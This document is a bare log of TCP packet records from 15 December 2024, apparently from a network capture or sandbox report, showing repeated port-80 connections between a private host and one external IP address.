                                                                                                                                                                                                                      Dec 15, 2024 09:15:30.271709919 CET4970580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:30.391479969 CET8049705185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:30.391550064 CET4970580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:30.391606092 CET4970580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:30.511667967 CET8049705185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:31.718343019 CET8049705185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:31.718455076 CET8049705185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:31.721373081 CET4970580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:31.734493971 CET4970580192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:31.737215996 CET4970680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:31.854327917 CET8049705185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:31.856981039 CET8049706185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:31.857127905 CET4970680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:31.864586115 CET4970680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:31.984400988 CET8049706185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:31.984522104 CET4970680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:32.104372025 CET8049706185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:33.473016024 CET8049706185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:33.473655939 CET8049706185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:33.474018097 CET4970680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:33.475980997 CET4970680192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:33.476370096 CET4970780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:33.595853090 CET8049706185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:33.596400976 CET8049707185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:33.596544027 CET4970780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:33.596544027 CET4970780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:33.716723919 CET8049707185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:33.716837883 CET4970780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:33.836586952 CET8049707185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:35.038561106 CET8049707185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:35.038743973 CET8049707185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:35.038826942 CET4970780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:35.057178020 CET4970780192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:35.062242985 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:35.177377939 CET8049707185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:35.182008028 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:35.182117939 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:35.188565016 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:35.308305025 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.515755892 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.515840054 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.515877962 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.515913010 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.515937090 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.515948057 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.515973091 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.515984058 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.516194105 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.516222000 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.516274929 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.516310930 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.516345978 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.516421080 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.516421080 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.635782957 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.635868073 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.636365891 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.638942957 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.680898905 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.708013058 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.708079100 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.708338022 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.712167978 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.712286949 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.712552071 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.720681906 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.720849991 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.720983982 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.731889963 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.732053041 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.732245922 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.738939047 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.738977909 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.739075899 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.745754004 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.745878935 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.745979071 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.754159927 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.754216909 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.754399061 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.762620926 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.762846947 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.762942076 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.770946980 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.771023989 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.771333933 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.779561043 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.779865026 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.779942036 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.787638903 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.837047100 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.875169992 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.875205994 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.875338078 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.900630951 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.900757074 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.900971889 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.902883053 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.903007030 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.903139114 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.907777071 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.907892942 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.908014059 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.912355900 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.912472010 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.912534952 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.917273045 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.917370081 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.917625904 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.921875000 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.922030926 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.922086954 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.926690102 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.926772118 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.926837921 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.931534052 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.931711912 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.931873083 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.936347961 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.936423063 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.936475992 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.941288948 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.941468954 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.945219994 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.945940971 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.945995092 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.950854063 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.951128006 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.951278925 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.954550982 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.956326962 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.956461906 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.957828045 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.960772991 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.960937977 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.962543011 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.965615034 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.965850115 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.965970039 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:36.969999075 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.024647951 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.066904068 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.066977024 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.067110062 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.069191933 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.094852924 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.094891071 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.095002890 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.096703053 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.096862078 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.096862078 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.100493908 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.100670099 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.100863934 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.104358912 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.104475975 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.104595900 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.108095884 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.108244896 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.108354092 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.112199068 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.112370014 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.112512112 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.116079092 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.116132975 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.116206884 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.120052099 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.120280027 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.120357037 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.123888016 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.124022007 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.124115944 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.127882957 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.128002882 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.128103971 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.131803989 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.131953955 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.132050991 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.135754108 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.135863066 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.135942936 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.139983892 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.140173912 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.140271902 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.143631935 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.143749952 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.143954039 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.147557020 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.147677898 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.147752047 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.151592016 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.151720047 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.151829958 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.155539989 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.155657053 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.155739069 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.159431934 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.159558058 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.159655094 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.163460970 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.163549900 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.163707972 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.167407036 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.167454004 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.167587042 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.171264887 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.227739096 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.259177923 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.259258986 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.259527922 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.261054039 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.261173964 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.262876034 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.265000105 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.265165091 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.266782045 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.268937111 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.269071102 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.270816088 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.272906065 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.273022890 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.274641037 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.276784897 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.276931047 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.277029991 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.280877113 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.281102896 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.281244993 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.284137964 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.284888983 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.284944057 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.284991980 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.287787914 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.287842989 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.287910938 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.291073084 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.291155100 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.291196108 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.294393063 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.294461966 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.294554949 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.297616005 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.297710896 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.297759056 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.300813913 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.300934076 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.300945044 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.304042101 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.304229021 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.304301977 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.307435036 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.307579994 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.307615042 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.310478926 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.310573101 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.310612917 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.313755035 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.313808918 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.313896894 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.316869974 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.317012072 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.317060947 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.320141077 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.320235014 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.320276022 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.323365927 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.323468924 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.323479891 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.326564074 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.326683998 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.326709986 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.329741001 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.329886913 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.330055952 CET4970880192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.333053112 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.333178997 CET8049708185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:37.333215952 CET4970880192.168.2.8185.81.68.147
